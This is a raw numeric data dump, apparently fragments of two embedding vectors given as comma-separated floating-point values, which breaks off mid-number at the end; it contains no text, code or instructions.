0.0066636926,-0.0071391733,-0.006854099,-0.024126273,-0.00053379,0.04606661,-0.0328946,0.01160425,0.011720814,-0.004128854,0.05484523,-0.0067054974,0.022285761,0.0010773932,0.024896901,0.00488012,0.0095762005,-0.0017944074,0.021744674,-0.0005720644,0.0064236023,-0.025928302,-0.0054550124,-0.023333475,-0.010973759,-0.009193386,0.012495861,0.0026200982,-0.0013722056,-0.021510186,0.006891386,-0.046723798,0.014691502,0.03217228,-0.011606821,-0.017304854,0.022875465,-0.0003833716,-0.0061724773,0.029361285,0.019724395,-0.006210689,0.023072926,-0.02482447,0.014426288,0.015145235,-0.030362956,0.013373612,0.025097255,0.0034325714,0.009749051,0.0060412576,-0.003342583,0.018213546,0.001116765,-0.0051564956,-0.013901776,0.018050369,-0.01845272,-0.008102772,0.0060655414,0.006570982,-0.022220172,-0.005268005,-0.008171442,-0.012974553,-0.023936056,0.008451461,-0.017368682,0.00087660376,0.012245699,0.0060737426,0.005486513,0.017290322,-0.010557259,-0.0007063718,-0.0043565207,-0.003905114,0.00926083,0.025534369,-0.0012295509,-0.016705086,-0.008382113,0.0059209857,0.02425271,-0.008690574,0.020860152,0.0025116107,0.0010166834,-0.015380848,0.0013323352,-0.012010465,0.009094911,-0.006944826,0.017564215,0.01364644,-0.008228679,-0.019333944,0.020654263,0.0033119016,0.005120117,-0.011157127,0.0042209523,0.015240675,-0.008574726,0.011641936,-0.00874922,0.0035125772,0.008244736,0.000042036416,0.0009140781,-0.009578218,-0.026095916,-0.016886601,0.024737326,-0.05322574,-0.00562634,0.017771766,-0.003723799,0.03338087,-0.032046497,-0.000098307064,0.012646079,0.018261287,0.01046392,-0.020286955,0.009688933,-0.007814291,-0.007592914,0.012139964,-0.019182827,-0.004333985,-0.015038569,-0.0070952843,-0.011537779,0.026290834,0.004794258,-0.027449362,0.012971108,-0.0024971173,-0.0268036,-0.0025875766,-0.009933151,-0.026715321,-0.0178818,0.033535033,-0.03182262,0.0041969432,0.0035935945,0.024364125,0.01730939,-0.011154306,0.010504692,-0.0092137065,-0.017758057,-0.03623393,-0.0122356005,-0.01610014,0.012450541,-0.026521003,-0.012073934,0.006844392,-0.003621753,-0.0067397216,0.013213086,0.0019622734,0.0022884274,0.013471955,-0.0022631634,0.0015076163,-0.028184332,-0.002386546,0.010190814,-0.010617524,-0.0034554766,0.023990782,-0.023700867,-0.043506183,-0.019809786,-0.03342638,-0.0063212276,0.006429638,0.020606706,0.0050368803,-0.0054520825,0.010364845,0.008790392,0.022656227,-0.0027227278,0.016023478,-0.01618689,-0.002061922,0.01620983,-0.005307748,-0.0047925827,-0.011709786,-0.0034390104,0.034879558,-0.01097449,-0.023197033,0.011330028,0.0058932668,-0.01059253,-0.018636692,-0.0066854875,0.011832688,-0.0013185405,-0.0024514245,-0.012749572,0.021019844,0.015632236,-0.017112691,-0.0035419252,0.019021275,0.0021094654,0.00035405872,0.0044703363,0.012347356,0.013673265,-0.025406947,-0.005575432,0.012852225,0.015729213,0.00032099223,0.017312147,0.013928581,-0.0053653657,0.003940669,-0.013405957,0.004112951,0.031464957,-0.019805863,0.0090874415,0.0026186411,-0.000597177,0.012812937,-0.010562477,-0.00034202798,0.0012965363,-0.006526289,-0.0036069578,0.00421062,-0.024057508,-0.015153967,-0.032945067,-0.0052304603,0.00601028,-0.01571472,0.0074759806,-0.04080095,0.017421829,-0.14370894,-0.0022250696,-0.031339146,-0.01997463,-0.018493947,-0.024086397,0.011343218,0.0023851118,0.002108283,-0.04027496,0.0052260594,0.0342199,0.016108835,0.00592203,-0.004816477,0.0126488665,-0.004756964,-0.005714637,0.0140761435,0.013237319,0.010172043,-0.0077846292,-0.011484989,-0.012070271,0.007780699,0.00993245,-0.024021067,0.033751823,0.007960041,0.018393403,-0.01330636,0.015254528,0.01968257,0.02302294,0.017104732,0.0021382396,0.005678963,0.021078076,-0.0013406023,0.024982551,-0.0032562786,-0.0016467687,-0.014718207,0.011348296,-0.0036838285,-0.009248047,0.016305795,0.027781673,0.0046905745,0.022889897,0.0040385057,-0.0050589377,0.0028195477,-0.013579914,-0.0006899966,-0.027232377,-0.00076074986,0.00032495838,0.016249413,0.016359698,-0.0064193215,0.00041035088,0.0018283678,-0.002746712,0.021946091,0.017495694,-0.011045492,-0.023140168,-0.028082525,0.003924716,-0.006038564,0.011963571,0.0006931066,0.008758536,-0.011154497,0.0069006654,0.008193397,-0.013244122,0.0005586955,0.029786097,-0.040041324,0.01134953,0.0179035,0.0056632836,0.0071133086,-0.020302301,0.010432068,-0.014548143,-0.009228599,0.012831967,0.0071400767,0.013001827,-0.006953406,-0.015627535,-0.012277126,0.0017122823,-0.01368759,0.0072240443,-0.007705366,-0.008579328,-0.000021519054,-0.015381996,-0.01864423,-0.02974323,-0.11357024,-0.00028122804,0.01846077,-0.009188797,-0.02083744,-0.016056675,-0.0072185956,0.0086711105,0.014588331,0.009474132,-0.02708214,0.010507472,0.0004654337,0.011785057,-0.0022621558,0.008807269,-0.020752668,0.006280322,-0.012775422,-0.010323613,0.0009454988,-0.0010954447,0.0004208755,0.018457219,0.013361778,0.0060574957,0.018064274,0.0427207,0.04070766,-0.004357111,0.0002761073,0.011671552,-0.01345745,-0.004672325,-0.040124986,-0.004286123,-0.006137869,-0.017414764,0.016271288,0.01863643,0.0069069145,0.0021915042,0.024088135,0.01812284,-0.015352352,-0.013148951,0.012601606,0.028433299,0.011153643,0.010464349,-0.01447685,0.02423237,-0.026522622,0.0006159673,-0.01280465,-0.012683905,-0.01567171,0.008210213,0.014604653,0.022773135,0.0053764153,0.008805216,0.0067874095,0.003980183,0.0039571314,0.035931513,0.002240689,0.01903738,-0.016371254,0.031169994,-0.004017612,0.020768074,0.03121621,-0.009960917,0.018873792,-0.0003214249,0.02156015,0.02310616,0.013623144,0.010624801,0.00031331912,-0.014363932,-0.008802941,0.02216577,-0.0456313,0.016917532,0.0043511624,0.004471589,0.003095264,0.004004406,0.038864195,0.003022084,-0.001160515,0.029375557,0.017539684,0.000804835,0.04050402,-0.031019518,-0.006645678,-0.019060438,-0.0021244315,-0.010986953,-0.002494899,0.011838384,-0.018700456,0.01987606,0.03991043,-0.0022725253,-0.0071572033,0.003270163,0.009858294,0.037537675,-0.017015208,0.012458943,0.018092468,0.013372526,-0.0062189046,-0.0056163725,-0.0101240175,0.0003756829,0.025723794,0.008554478,-0.004692096,-0.004323644,-0.0023212805,0.0015930234,-0.020369291,0.012667256,0.002564355,-0.03697994,-0.006343736,0.003545403,0.024949316,-0.01087018,-0.011795237,0.0064209476,-0.01661602,-0.0011656261,0.0006073182,-0.009437107,-0.01065457,0.013260698,0.0045209094,-0.016293995,0.01210965,-0.008632196,-0.0026584098,-0.011608913,-0.009616887,0.013599891,-0.008423749,0.007995757,0.013795856,-0.013671297,-0.017199077,0.0029904253,-0.02361785,0.015338955,0.0115655,0.014257252,0.0061967266,0.013888848,0.0110726105,-0.020510409,0.01100161,0.00927573,-0.0016179668,0.0006917593,-0.009409431,0.011890075,-0.0017675235,-0.0043692808,-0.00430811,-0.063596494,0.012443512,0.028308751,0.0039024774,0.027869925,0.031039886,0.016145853,-0.016198395,-0.0043132454,-0.009019145,-0.011078037,0.013386357,0.013382718,-0.013990458,-0.011689685,-0.01238609,0.0053026993,0.030174226,0.0029245713,-0.019202754,-0.007946326,0.02116501,0.0027947745,0.0068373247,0.0026118269,0.007889867,-0.0018470761,-0.034158915,0.011491916,-0.0038930506,-0.009239941,0.005764668,0.00443332,0.0035188668,0.04924444,0.0021962482,-0.017954694,-0.003659686,0.025645792,-0.023291275,-0.0090943985,0.02033611,0.020372303,-0.01776551,-0.018657647,0.019281443,0.014548686,-0.0072041717,-0.011971506,0.017527329,0.03738494,-0.012266387,0.02984516,0.044450957,0.016688513,-0.035373162,-0.020223087,0.015763145,0.01262466,-0.0032082857,-0.018418418,0.0005565995,-0.025746828,0.015020037,0.00021629842,0.021042187,0.010280527,0.038739022,0.008104808,0.01932215,0.009730711,0.028614186,-0.0076141628,0.00043807604,0.0067067887,0.0005304078,0.018125594,0.0024918437,-0.005240885,-0.0037183752,-0.011501531,0.0069688144,0.009627312,0.011337217,-0.0063116513,-0.006413365,0.0041847616,-0.018464979,0.0043019517,-0.027650744,-0.014398851,0.0021787577,0.0050606285,-0.015874375,-0.0046361983,-0.008986176,0.004649133,0.016982496,-0.011311858,0.010317828,0.01705355,-0.012762639,-0.0059583336,0.009968848,0.00832363,0.0091643315,0.012010936,-0.0000789965,-0.00013587171,0.009266269,0.011202393,-0.0017831316,0.01897992,-0.0016398609,-0.0067965807,-0.00061404146,0.003930765,0.025368152,-0.0066999216,0.004883619,-0.0067208656,0.0058015143,0.023591759,0.018795563,-0.017714603,-0.0026354564,0.00839279,0.003647541,-0.020610496,0.0035497993,-0.0030641628,0.021439387,-0.007514715,-0.010679147,0.018206842,-0.010777546,-0.0025519815,-0.0027525336,0.008123744,-0.013789273,0.008933556,-0.0026292074,0.021367665,0.009041324,-0.01533081,-0.038064647,-0.010319232,-0.008374314,0.023191275,0.03098564,-0.015392507,-0.0052802553,0.0047297627,-0.017256528,0.03847712,-0.004852637,-0.03239884,0.0049447967,-0.0031508459,-0.0030701833,-0.0046205465,0.026304968,0.009006313,0.0021240062,0.032642026,0.0016474364,0.016686805,0.003988199,0.019552773,-0.008818501,0.0036161211,-0.012981158,0.008880886,0.0068733413,-0.0057262057,0.020208605,-0.008538955,-0.0073254625,0.008962961,0.0070868027,-0.018720778,-0.03315411,0.035242572,-0.02143465,-0.0021051378,0.006416683,-0.0074752984,-0.031013632,0.01991227,-0.024114706,-0.036839277,0.009683489,-0.019201243,-0.029151453,-0.0017595731,-0.027789332,-0.007962506,-0.012901414,0.011617266,-0.01709959,-0.011115862,-0.007798784,-0.09233508,0.0043980326,0.020660268,-0.000007915566,0.041426845,-0.006504342,-0.008121766,0.006819938,0.0071671824,0.0060155145,-0.0034311265,0.0047538294,0.008305335,0.008876658,0.033100568,-0.022434887,0.009593606,0.0144967735,0.0055185664,-0.02614068,-0.012295499,-0.001489341,-0.02595504,-0.0035914201,0.0021082545,-0.0071474984,-0.004268685,-0.014523662,-0.0051028566,0.0007057061,0.01120562,0.011148486,-0.0012840872,-0.021289011,-0.007687165,-0.002096627,-0.014226491,0.020298121,-0.014526316,-0.035386287,0.0007225002,-0.010649382,0.0030158975,0.00058067596,-0.030247834,0.02665343,-0.034873214,0.005276201,-0.020645065,0.00081622554,0.017962122,0.004760958,-0.01027691,0.03139145,-0.00046978035,-0.0069185146,-0.000035541452,0.010245975,0.029673206,0.006051031,-0.013920884,0.0014585308,-0.0017064578,-0.009811204,-0.00511106,0.0068575004,-0.006499544,0.012843831,0.012917775,0.008688769,-0.011440084,-0.027745405,-0.011166006,-0.016601637,-0.0147924125,0.013047215,0.01034114,0.0042685033,-0.02044449,-0.009342913,0.044289317,0.00004837004,0.019263402,-0.0016216993,-0.0012522901,0.024580253,-0.015092559,-0.000493324,0.033231918,0.012680983,-0.00789203,-0.0015464844,0.017795289,0.00051380123,0.0038467643,0.004791574,-0.0239128,-0.0035486447,-0.009547643,-0.0039504347,-0.00807556,0.0064163404,0.0015366849,-0.024710216,-0.0034933651,0.013050338,0.00497538,-0.0025796879,-0.019475227,-0.013774576,0.016564311,0.021488456,0.013247328,0.010287838,0.020511156,0.00020028838,0.0073321853,0.00578013,-0.014498365,-0.019536788,-0.0037877874,0.0021631608,-0.012774787,0.033584528,0.018349713,0.010060431,0.019329185,0.0008461748,-0.012231674,0.004284937,-0.015088706,0.0039442023,0.011398777,0.015850034,-0.018341247,-0.0047168583,-0.013703831,0.008122867,-0.00039131683,0.019588571,-0.0052519697,-0.02072577,0.001962934,-0.024993764,-0.024731519,0.01275724,-0.015244393,-0.0018304548,-0.0011819302,-0.025269499,0.00038509947,-0.011665437,0.0044479766,0.027780049,-0.01617937,0.0003527843,0.010282844,-0.0012715146,-0.015968323,-0.017879907,-0.006341046,0.0063830432,0.0017027066,0.0018211766,-0.018785622,0.014546996,-0.0058632293,-0.004035637,-0.026472371,0.0065603117,-0.017769106,-0.02409379,0.018588088,-0.014062223,-0.014665786,-0.012372218,0.03151225,0.008184179,-0.008837491,-0.008562043,-0.022907512,0.0029423123,0.00032316698,-0.007927843,-0.020071495,-0.018199619,0.0023812393,0.02441134,0.0069667003,-0.011971658,-0.002077007,-0.01685493,0.0005979127,-0.0012087802,-0.009050464,-0.026157739,0.0078472225,0.011566168,-0.021507243,0.0041148905,-0.0068181665,0.014242133,-0.00014628521,0.010651007,0.03613528,0.030960646,-0.022748481,0.018969178,0.0031993503,-0.010225354,-0.008874853,0.03903491,0.013108665,0.10728197,0.010287821,-0.00069644,0.018199207,-0.002890914,-0.012802826,0.017190885,-0.008557201,0.0068857325,0.0042019216,0.002576634,-0.024866577,0.02591022,0.011060355,-0.015138063,0.026619935,0.016302202,-0.009704643,0.007009606,0.013498035,0.021854518,-0.023282725,-0.0049424754,-0.047392234,-0.007444,-0.055976022,0.01927248,0.02392697,-0.009499287,0.043697856,0.0026925013,0.0089399945,0.009244488,0.0021115162,-0.014231933,0.019368427,0.002218276,-0.006416884,-0.011720048,-0.0150944,0.024058271,0.009281729,-0.009611153,-0.01595292,-0.0014018916,-0.00031943945,0.010693664,-0.016463475,0.0027619677,-0.015010575,0.0019389626,-0.009040926,0.008397136,0.008157298,0.031769477,0.0011159275,0.019318348,0.010504688,0.012368605,-0.012068679,0.009558751,-0.001237411,0.002212295,-0.0016515866,0.011061924,-0.009033087,0.009205302,-0.0148196025,-0.005473303,-0.0062467298,0.033841427,-0.00713591,-0.02577201,-0.004090728,-0.019131718,0.01957331,-0.0066587077,-0.011828895,0.039574884,-0.02566801,0.019450122,0.014331311,0.007184052,-0.0010599159,0.002851134,0.002864096,-0.03437143,0.008581358,-0.0015062253,-0.009816318,-0.014714111,0.008446604,0.0064113573,-0.014853301,-0.016418679,0.010105336,0.017546864,-0.01942939,-0.0031936022,-0.0070031765,-0.03285478,-0.028328119,0.0043935264,0.0063778856,-0.011785064,-0.005117984,0.008743489,-0.0003033536,-0.014792684,-0.009320676,0.010297302,0.02148901,-0.01746657,0.004419034,-0.0010709299,0.038818628,-0.037666958,-0.029137174,0.011522636,-0.013396337,-0.018761592,-0.0037048745,-0.0001936771,0.056262903,0.0037219315,0.010846479,-0.019616133,-0.0011368847,0.0048822802,0.016549146,0.006750251,-0.03945485,0.00025739524,0.020330843,-0.0047196257,0.00021543201,0.016376646,-0.010222931,0.002900091,-0.001762363,0.0015228059,-0.0099113565,0.009624273,-0.0047347145,0.011765265,-0.004318433,0.01570907,-0.016425276,-0.022678755,0.011802254,0.02188711,-0.0027649447,-0.010688268,-0.009556334,-0.030828822,0.002814617,-0.029874284,0.027915334,-0.0010070743,-0.004631453,0.012320467,-0.020242112,0.017560972,-0.041055765,0.01715455,0.011826838,0.003853084,0.0271426,0.011324203,-0.006069848,-0.010241931,-0.015241953,0.006260941,0.000988118,-0.013286556,0.014360837,0.0072162114,0.011987824,-0.011519533,0.012754982,0.0004344407,0.009807586,0.0066717267,-0.016137276,0.021995291,0.00699566,-0.00072911097,0.0025670875,-0.022134202,0.03677219,0.00552317,0.0019940964,0.007595499,0.016780442,-0.010889086,0.004660148,-0.019423625,0.038111657,-0.014639042,-0.020087013,-0.013174135,-0.00781602,0.006630654,-0.014742639,-0.0015294406,-0.029149225,-0.013214483,-0.013913015,0.001293333,-0.01090806,0.019080522,0.004027233,-0.004552107,-0.025784697,0.015245168,0.007304662,0.00038272043,-0.015987353,-0.013245567,-0.017452901,0.0060907216,-0.005934411,-0.012030247,0.009079591,-0.01940151,-0.015994787,-0.0005718639,0.011121202,0.014853203,-0.040547438,-0.019759621,0.026040899,0.0031518524,-0.004695572,-0.0227069,-0.013393212,0.020291556,0.011300207,0.011962986,0.014162114,-0.0256085,-0.015565356,0.025201513,-0.00009691459,-0.0067195157,-0.011110818,-0.0104523,-0.004144284,0.006137943,-0.004525649,-0.023143388,-0.011671625,-0.009587082,-0.024781676,-0.02635797,-0.02432151,0.014832814,0.03368626,0.006230396,-0.0029826425,0.006858658,-0.005604891,-0.010790397,0.027161185,0.0058018267,-0.0035396325,0.026584756,0.0027235681,-0.005421137,-0.0063151415,0.0058905226,0.026246449,-0.019948697,0.035502274,0.0018951776,0.000123197,-0.009147641,-0.003779125,-0.016246168,0.0016748514,0.013726222,-0.019757133,-0.008868352,-0.014951342,0.009295752,-0.008065885,0.020482657,0.011461552,0.050553173,-0.028439082,-0.007960237,0.012020881,-0.013852322,-0.021910025,0.019981522,-0.0025373402,-0.03245028,0.0008717276,0.027632449,0.016291006,0.0048319325,-0.026794476,-0.0037795876,0.0199222,-0.031149166,0.011137986,0.024401994,-0.01782455,-0.009696556,0.0007209101,-0.02556906,0.0031386376,-0.009418841,0.00042892701,-0.00559738,-0.0073697567,0.012570941,-0.0038640348,-0.0067981994,0.0030912322,0.037962526,-0.024811555,0.011550778,0.0021952647,0.004068546,0.00537523,0.0014958575,-0.037451793,-0.0388546,-0.014726784,0.001476504,0.009155407,-0.009588132,-0.024328329,-0.015783858,0.00062837295,-0.0015845805,0.14233427,-0.02019363,0.00034446848,0.02422184,-0.00004081992,-0.00486148,0.01969105,0.014913281,-0.0047830795,0.0072657326,0.012205253,-0.0073146317,-0.00451005,0.011506364,0.005934134,0.0014782556,0.0034029824,0.16175689,0.0038774426,0.009565239,0.013241088,-0.0021440706,0.012388849,-0.00049788493,0.007249362,-0.084903784,-0.01838156,-0.037575323,-0.004887716,-0.003203242,-0.021850972,0.034536537,-0.017066717,-0.001368265,-0.010297707,0.0076888795,0.0039777984,0.0020577805,-0.0119835725,-0.014439455,0.025250487,-0.008888082,0.003951075,-0.013167942,-0.008054943,0.029168723,-0.022595087,-0.024379907,-0.026369074,0.020628342,-0.0030282615,-0.018171204,0.008772204,-0.007105558,-0.0011342042,-0.0023490146,-0.004796927,-0.012569193,-0.014109212,0.01269407,-0.016420495,0.0021276139,0.005158442,0.027956106,-0.018462906,-0.0064255344,-0.014169406,0.003259382,-0.007204966,0.019248014,0.002259697,-0.0022530705,-0.018179137,-0.03182215,0.021494076,-0.01397638,-0.006776566,-0.0029891715,0.019534813,-0.0050423257,0.022250457,0.027580105,-0.027714927,0.0153537225,0.02380207,0.03372588,0.0024370167,-0.0025747102,0.0051921117,-0.0023023882,-0.017071899,0.009393836,0.0010501676,-0.0025643476,-0.0074072825,0.025004886,-0.00034904532,0.015264593,0.009907231,-0.016689459,-0.010459145,0.019349797,-0.006360461,-0.0011480656,-0.00648162,-0.001956014,-0.007032542,-0.03048371,0.0004540793,0.001124917,0.0034605253,-0.008182683,-0.017124487,0.018207988,-0.0012547506,-0.004446619,-0.011083478,-0.008741033,-0.041967787,0.00082617195,0.0053736176,-0.0053417003,0.005787177,0.0053209183,-0.023267664,-0.0008838815,0.0015719786,0.034577683,-0.0004624704,0.0014231713,-0.021805534,-0.0025558919,0.0007598183,0.041563667,0.016314184,0.0022656242,0.008238469,-0.01202572,-0.008207201,0.00905664,-0.006851768,0.015826738,0.010437572,0.01496615,-0.0033130175,-0.009898447,0.016469667,0.012529563],[0.0071075647,0.009122897,-0.028962847,-0.025261147,0.0032783619,-0.019255556,0.010254344,0.038222063,0.003900711,-0.016730577,-0.0027495401,0.0026165564,0.011363141,0.0037595318,-0.0049744574,0.023703834,-0.011438223,-0.00025427167,-0.0007069774,-0.020888675,-0.0049630813,-0.004176231,0.029854834,-0.0024557319,0.022357741,-0.0037794246,0.010240893,0.004582078,0.023044536,0.016157081,-0.017603619,0.024770714,0.0075067943,0.025478262,0.020963807,-0.0040205126,-0.032619044,-0.010472573,0.016308755,-0.0036774545,-0.0030198453,0.019275948,-0.015214836,0.014773226,0.0063619674,-0.011754092,-0.010280194,-0.003611713,-0.009827992,0.034081984,0.007772563,-0.0017978891,-0.042217504,0.028765814,0.0006773459,-0.0108615775,0.025763389,-0.038461115,0.0078301905,-0.034593333,-0.0073341765,-0.010468243,0.017217185,-0.031009253,0.031023037,0.0016868239,-0.006481327,-0.033341184,0.019481894,-0.025754385,0.016391817,0.010742082,-0.00825341,-0.013516212,0.005442311,0.0065332465,0.0005415088,-0.020728528,-0.0012835431,0.01358211,-0.03283317,0.006838489,-0.003439353,-0.0078562545,0.019986456,0.021947954,0.0128054675,0.030676624,0.007960987,0.0010016516,-0.015000456,0.0017192158,0.012869315,0.005470476,-0.035223994,0.022148427,-0.001549804,-0.02524803,0.019722754,0.0037071109,0.009451682,0.010522381,-0.013362651,0.011448849,-0.0041731796,-0.013548803,-0.0028796606,-0.016045975,-0.015292653,-0.0049423957,0.0087855,0.0010445113,0.0097812265,0.004505168,-0.020453539,-0.005481673,-0.023665927,0.0044710822,0.008231491,0.00033122796,0.0073651583,0.00038225472,0.006176887,-0.01489667,-0.023887856,0.013726824,-0.019499993,0.021848666,0.0050140494,0.011325229,-0.0066015506,0.0050938083,-0.0068709026,0.0013687863,0.0026405158,-0.00040060058,-0.00000719577,-0.021699436,-0.021678813,-0.018481674,0.019478973,-0.012859384,0.0039809225,0.011424238,0.010733635,0.011309488,-0.004769311,-0.0017628311,0.019735271,-0.008357727,0.02472194,-0.024454517,0.009723478,0.0058595478,0.018103398,0.04716324,0.021993266,0.009463303,-0.031040702,0.008960966,-0.0049118404,0.00142581,-0.0017408301,0.0043260427,-0.016770288,-0.021312173,-0.0054350714,-0.003165457,-0.005777062,-0.011221082,0.022911953,0.018142939,0.026724381,-0.022212245,0.0071922955,0.011382083,0.0041259215,0.005089911,0.011904219,0.002459642,0.024133155,-0.0045811506,-0.029683301,-0.005967992,-0.013116102,0.020495294,0.01122404,0.014916377,-0.017550835,-0.0027952474,0.026973234,0.008264778,0.017225988,0.01012239,-0.013968664,-0.018764505,0.010690388,0.07048248,-0.017649937,0.00942614,0.0066058734,-0.008533524,0.01111584,-0.045790676,0.012681555,0.0007655339,-0.011154891,0.0076056872,0.007335474,0.0026850072,0.009764806,-0.005193375,-0.00037930446,0.027176272,-0.013714947,-0.061515164,0.032913905,-0.0012445498,-0.01817332,-0.000615454,0.0010936381,-0.0025913182,0.023844928,-0.020031204,0.006559786,-0.023216689,-0.0014570854,-0.010821394,-0.021574294,-0.0347892,0.023438822,0.0025511526,-0.0029694445,-0.030754156,0.008959435,-0.014830867,0.0073532755,-0.013693209,-0.013830541,0.0059100376,-0.0149054285,0.018902926,0.016574368,0.01766065,-0.0060025114,-0.0031893156,0.016171424,-0.0070443843,0.0026945036,0.018227426,-0.013262678,-0.008311068,0.0070085255,0.021413745,-0.012314184,-0.027263204,0.029499087,-0.0021071658,0.001873957,0.0057094586,0.025143439,0.03309548,-0.019978145,-0.0067291637,0.024488242,-0.010148505,-0.006069166,-0.020919912,0.0022660003,-0.014379689,0.02205033,0.023291942,0.03364418,-0.013023476,0.0076584765,-0.0060644923,-0.03071259,-0.01285041,-0.008040064,-0.0045609483,-0.003787031,0.010322926,0.005416324,-0.0007828268,0.0044706613,0.020725984,-0.006580397,-0.011796579,0.023692215,0.0075447485,-0.0006886828,-0.01709126,0.032687817,0.030072592,-0.0007654572,0.0030902964,-0.017617486,0.03329307,0.036313966,-0.019353399,0.0016475082,0.007254622,-0.000059561586,-0.012660849,-0.005269681,0.014456946,-0.013861988,0.019443728,-0.027928934,0.0050279717,-0.03802817,-0.010338722,0.010335032,0.0003107253,0.0181697,0.006389754,-0.026054863,0.00539644,-0.0012521826,0.0049995547,0.013151375,0.0010122609,0.041788705,-0.0041831573,-0.016054874,0.0029881024,0.00047945237,-0.034406975,0.003350173,0.02037697,0.002278686,-0.006024963,0.0026686385,0.027623978,-0.041447144,0.029794417,0.0057149488,0.018015675,0.016064487,-0.007555327,-0.013121946,-0.0025023015,0.0080016535,-0.007911106,0.0012250346,-0.006062027,0.0061812694,-0.0033291804,0.022040647,0.01103215,0.015550931,-0.03918463,-0.007313336,-0.011295871,-0.00929399,-0.001879261,-0.0036612784,0.0096421335,0.009890351,0.012421579,0.05146404,-0.01677512,0.0019260766,-0.006453214,0.08999803,0.025768088,-0.005086361,0.003173738,0.017291805,0.0020313202,0.017735034,-0.00077873195,0.016820287,0.0014546863,-0.017491728,0.002074421,-0.0009885841,0.022810036,-0.0059234886,0.021763787,-0.028058881,-0.020518959,-0.013256731,-0.016796006,0.03321813,-0.009973875,0.0035435518,-0.01234385,0.031962447,0.013459291,0.010603613,0.009458333,0.006147486,-0.017948488,0.011578469,0.012066122,0.033541095,0.0119731,-0.014003747,0.022919802,0.0070324526,-0.0041119833,-0.039122604,-0.0070982473,0.0043419544,0.011339367,-0.0055100056,-0.026708866,0.0035058446,0.045863483,-0.0075754477,-0.01096317,-0.003809264,0.02460585,0.012609888,0.00035928868,-0.009504148,0.0034837353,-0.027496602,0.019140713,-0.0043203784,-0.024597974,0.039275657,0.038000558,0.0010688074,0.026703123,-0.0077231233,-0.0056614275,0.0004877833,-0.0046400083,-0.002643554,-0.02008037,0.0013724151,0.022552727,-0.0024083685,0.008088796,-0.0044951756,0.004617791,0.0131368525,0.023246326,-0.004659082,-0.00801167,-0.00038687928,0.06438212,-0.0019144655,0.007876716,0.007438467,0.033752196,-0.00089086755,-0.00034803705,-0.006684789,-0.032355074,0.008009006,-0.02481527,-0.012021254,-0.004359677,0.030083809,-0.0033020133,-0.015378638,0.0019230602,0.015950624,0.021984246,0.0063736076,0.0049586343,0.0042814957,0.0039296504,-0.022531463,-0.027356137,-0.0038872773,-0.01544086,0.0146855675,-0.004514235,0.0076232417,0.04664429,-0.038880505,0.0066340026,-0.0041986634,-0.034573082,-0.00540341,-0.008553711,0.0040352745,-0.01878759,0.014588636,-0.012587688,0.02553224,-0.0014086022,-0.00055532804,0.02565243,-0.016634401,-0.025455497,0.0006246814,-0.036041766,0.0053075487,0.0029934805,0.009577731,0.0066957353,0.020181995,-0.035642132,0.043120254,0.029579027,-0.012373218,-0.026003703,0.013189803,0.021537477,-0.00014322787,0.010093147,0.011986038,0.004921465,0.009041542,0.030106176,0.039867885,-0.018284589,-0.013041001,0.0050380747,0.0014039787,-0.004205644,0.004482145,-0.027997032,0.009929272,-0.0004727487,0.042465452,0.014435597,-0.011505529,0.0073822634,0.0022085602,-0.022528676,-0.011492951,0.011593053,-0.012512527,0.023036968,-0.02028094,0.032596443,-0.006799663,-0.03112838,-0.020256266,-0.0020591198,0.0054934667,0.0013981184,0.000078931414,-0.031164901,-0.0011344935,-0.010860192,0.028989626,-0.003094682,0.015634527,-0.013011189,-0.0061021727,0.0059311283,-0.00580818,-0.025972692,-0.0038864554,0.0022971428,-0.010262381,-0.012797773,-0.0092121465,-0.006593599,0.02249127,0.021830777,0.010418707,-0.017661262,0.0019110313,-0.0036687227,0.016253008,0.025735606,0.005523733,-0.014540243,-0.016549775,0.020975621,0.002440498,0.015128259,0.030853797,-0.0007430446,-0.0066581042,0.019920582,0.03939901,-0.0028096542,0.0039081923,0.017700782,0.023350786,0.010533819,0.00089949305,-0.007355471,0.0111529,0.016619338,0.0028912122,-0.007831797,-0.011522351,-0.01137275,0.007951568,-0.025152266,0.003981046,0.019279607,-0.018626401,-0.019066652,-0.0049325856,-0.025841134,-0.024279341,0.008685407,0.010875664,0.004258002,-0.024092516,0.0005726386,-0.009347579,0.02731118,-0.0025460697,0.010230002,0.0074793096,-0.007453094,0.032302972,0.019775577,-0.01798826,0.007730062,0.014720875,-0.008019863,0.011945708,0.007142887,0.004523532,-0.014388622,-0.0010681396,0.0052719866,0.0014681029,0.007658004,-0.0041271956,-0.014811117,0.02935524,0.010228036,-0.00429244,0.011314856,-0.01632132,0.008203834,0.0076800846,-0.0067698145,0.0054729064,-0.007155073,0.03321015,-0.002903815,-0.01037286,0.011253243,-0.01580739,-0.014548396,-0.016749961,0.018957907,-0.025849367,0.017701881,-0.010088023,-0.018407816,-0.013270243,0.028665913,0.009759941,0.0056670746,-0.011761684,0.0077928035,-0.0042958558,-0.0064472845,-0.022080887,0.020471523,0.024971597,0.017313484,-0.01625904,0.0063127466,-0.013712499,-0.04799423,-0.018559728,0.002798202,0.01786307,0.0005400117,-0.005185889,0.005623612,-0.012915127,-0.027839651,0.040402867,-0.008727987,0.031880725,-0.011718369,-0.029885316,0.01896798,-0.015123242,-0.0035088307,0.0049897926,-0.009463427,0.0014411268,0.004563893,0.023192784,-0.0047007967,-0.0018745888,-0.0006332736,-0.006314151,0.010526403,-0.029886546,0.01629466,-0.008769238,-0.00014755441,0.011934856,0.0030725289,0.021708764,-0.007839278,-0.019782078,0.008450069,0.014732048,0.042010315,-0.0016613365,0.018285701,-0.0005146631,-0.009115202,0.0177325,-0.019537386,-0.0029212513,0.021616241,0.019765498,0.0071763746,0.011589408,-0.013299945,0.0007729007,-0.010272987,-0.03758998,-0.034934852,0.0074153347,0.0073793987,0.02668411,0.03223483,0.0046531023,-0.0014578665,-0.00082228717,-0.0022859385,-0.008650052,0.02139113,-0.00018602432,0.008626042,0.008043703,0.013230081,-0.015199543,-0.022962164,-0.002767286,-0.015877603,0.008708455,-0.030472053,0.011773698,-0.01174043,-0.012814858,-0.044369668,0.030755473,0.02568248,0.00526772,0.0008914148,-0.032291915,-0.004268887,-0.0016766861,-0.015578548,-0.016302578,-0.016187655,0.002896137,0.03069222,-0.055391647,0.00707696,0.01298923,0.009443991,-0.0020430854,-0.00011938606,-0.0070596505,-0.046402626,0.018425578,-0.014092706,0.028452275,0.022475906,0.020041022,0.0035422656,0.01075942,-0.0009524809,-0.005389859,-0.010055092,0.004634722,-0.01099938,-0.006148543,0.008703645,-0.006984925,-0.026140304,-0.020800292,-0.011984663,0.035283763,-0.023070164,-0.014629029,-0.025163138,-0.009161193,-0.0036192546,0.012729619,-0.0029528665,0.034682263,0.021461174,-0.0